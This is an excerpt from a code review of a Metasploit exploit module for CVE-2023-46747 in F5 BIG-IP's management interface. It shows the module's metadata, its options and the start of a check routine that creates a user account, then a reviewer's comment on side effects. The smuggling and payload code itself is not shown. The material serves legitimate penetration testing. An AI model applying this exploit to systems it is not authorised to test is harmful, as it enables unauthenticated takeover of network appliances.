modules/exploits/linux/http/f5_bigip_tmui_rce_cve_2023_46747.rb

```diff
@@ -0,0 +1,286 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/proto/apache_j_p'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Retry
+
+  ApacheJP = Rex::Proto::ApacheJP
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'F5 BIG-IP TMUI AJP Smuggling RCE',
+        'Description' => %q{
+          This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external,
+          unauthenticated attacker to create an administrative user. Once the user is created, the module uses the new
+          account to execute a command payload. Both the exploit and check methods automatically delete any temporary
+          accounts that are created.
+        },
+        'Author' => [
+          'Michael Weber', # vulnerability analysis
+          'Thomas Hendrickson', # vulnerability analysis
+          'Sandeep Singh', # nuclei template
+          'Spencer McIntyre' # metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-46747'],
+          ['URL', 'https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/'],
+          ['URL', 'https://www.praetorian.com/blog/advisory-f5-big-ip-rce/'],
+          ['URL', 'https://my.f5.com/manage/s/article/K000137353'],
+          ['URL', 'https://github.com/projectdiscovery/nuclei-templates/pull/8496'],
+          ['URL', 'https://attackerkb.com/topics/t52A9pctHn/cve-2023-46747/rapid7-analysis']
+        ],
+        'DisclosureDate' => '2023-10-26', # Vendor advisory
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD
+            }
+          ],
+        ],
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443,
+          'FETCH_WRITABLE_DIR' => '/tmp'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            IOC_IN_LOGS, # user creation events are logged
+            CONFIG_CHANGES # a temporary user is created then deleted
+          ]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    res = create_user(role: 'Guest')
```

Comment:
Not a blocker, I don't _think_ this warrants requiring a defanged mode as it's going to create a user and leave it behind as a worse-case scenario which won't break any environments